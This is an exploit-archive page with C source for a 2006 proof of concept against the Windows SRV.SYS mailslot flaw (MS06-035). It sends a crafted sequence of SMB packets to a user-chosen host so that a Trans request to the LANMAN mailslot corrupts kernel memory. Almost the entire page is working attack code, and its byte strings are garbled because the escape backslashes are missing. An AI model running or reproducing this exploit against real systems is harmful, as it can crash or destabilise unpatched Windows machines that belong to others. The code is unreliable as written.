MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035)
# Published : 2006-07-21
# Author : cocoruder
# Previous Title : Sendmail <= 8.13.5 Remote Signal Handling Exploit PoC
# Next Title : MS Internet Explorer 6 (Content-Type) Stack Overflow Crash

#include <stdio.h>
#include <windows.h>
#include <winsock.h>

/*******************************************************************
Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit

by cocoruder(frankruder_at_hotmail.com),2006.7.19
page:http://ruder.cdut.net
*******************************************************************/


unsigned char SmbNeg[] =
"x00x00x00x2fxffx53x4dx42x72x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x88x05x00x00x00x00x00x0cx00x02x4ex54"
"x20x4cx4dx20x30x2ex31x32x00";

unsigned char Session_Setup_AndX_Request[]=
"x00x00x00x48xffx53x4dx42x73x00"
"x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00xffxffx88x05x00x00x00x00x0dxffx00x00x00xff"
"xffx02x00x88x05x00x00x00x00x00x00x00x00x00x00x00"
"x00x01x00x00x00x0bx00x00x00x6ex74x00x70x79x73x6d"
"x62x00";

unsigned char TreeConnect_AndX_Request[]=
"x00x00x00x58xffx53x4dx42x75x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08"
"x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00"
"x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00"
"x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f"
"x3fx00";

unsigned char Trans_Request[]=
"x00x00x00x56xffx53x4dx42x25x00"
"x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x08x88x05x00x08x00x00x11x00x00x01x00x00"
"x04xe0xffx00x00x00x00x00x00x00x00x00x00x00x00x55"
"x00x01x00x55x00x03x00x01x00x00x00x00x00x11x00x5c"
"x4dx41x49x4cx53x4cx4fx54x5cx4cx41x4ex4dx41x4ex41";


unsigned char recvbuff[2048];





void neg ( int s )
{
char response[1024];

memset(response,0,sizeof(response));

send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
}

void main(int argc,char **argv)
{
struct sockaddr_in server;
SOCKET sock;
DWORD ret;
WSADATA ws;

WORD userid,treeid;


WSAStartup(MAKEWORD(2,2),&ws);

sock = socket(AF_INET,SOCK_STREAM,0);
if(sock<=0)
{
return;
}

server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr(argv[1]);
server.sin_port = htons((USHORT)atoi(argv[2]));

ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
if (ret==-1)
{
printf("connect error!n");
return;
}

neg(sock);

recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
if (ret<=0)
{
printf("send Session_Setup_AndX_Request error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

userid=*(WORD *)(recvbuff+0x20); //get userid


memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid


ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
if (ret<=0)
{
printf("send TreeConnect_AndX_Request error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

treeid=*(WORD *)(recvbuff+0x1c); //get treeid

memcpy(Trans_Request+0x20,(char *)&userid,2); //update userid
memcpy(Trans_Request+0x1c,(char *)&treeid,2); //update treeid

ret=send(sock,(char *)Trans_Request,sizeof(Trans_Request)-1,0);
if (ret<=0)
{
printf("send Trans_Request error!n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

}

// www.Syue.com [2006-07-21]